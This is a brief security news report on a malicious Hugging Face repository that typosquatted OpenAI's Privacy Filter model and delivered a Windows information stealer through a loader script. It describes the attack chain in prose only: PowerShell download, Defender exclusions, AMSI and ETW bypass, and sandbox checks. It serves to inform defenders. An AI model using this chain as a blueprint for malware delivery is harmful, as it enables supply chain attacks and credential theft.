A malicious Hugging Face repository that impersonated OpenAI’s Privacy Filter model reached the platform’s trending list before it was disabled, with HiddenLayer saying the page drew about 244,000 downloads and 667 likes in 18 hours.
KEY FACTS
- Impersonation The project copied the description from OpenAI’s Privacy Filter release to look legitimate.
- Payload A loader file fetched and executed a Rust-based information stealer on Windows systems.
- Delivery The code used a JSON paste service and remote servers to pull second-stage content.
- Targets The final malware stole screenshots, browser data, Discord data, wallet files and seed phrases.
A technical analysis by HiddenLayer Research said the repository typosquatted the legitimate model page and included a loader script named loader.py that triggered the attack chain. Hugging Face has since disabled access to the malicious model.
The report said the loader disabled SSL verification, decoded a Base64 URL from JSON Keeper and passed a command to PowerShell. That step downloaded a batch script from a remote domain, elevated privileges through a UAC prompt, set Microsoft Defender exclusions and launched the next stage.
After a scheduled task ran the executable, the task removed itself and did not survive a reboot. The malware also checked for debuggers, sandboxes and virtual machines, and tried to disable AMSI and ETW before sending stolen data in JSON format to another domain.
The same analysis identified six more Hugging Face repositories that used a similar Python loader. It also linked the infrastructure to a Windows executable that connected to a command and control server previously associated with ValleyRAT, a modular remote access trojan tied to the Silver Fox group.
WHY IT MATTERS
The case shows how attackers can use trusted open source platforms to lend credibility to malware and reach large numbers of potential victims. It also underscores the risk of supply chain abuse in AI and developer ecosystems, where lookalike projects can hide malicious code.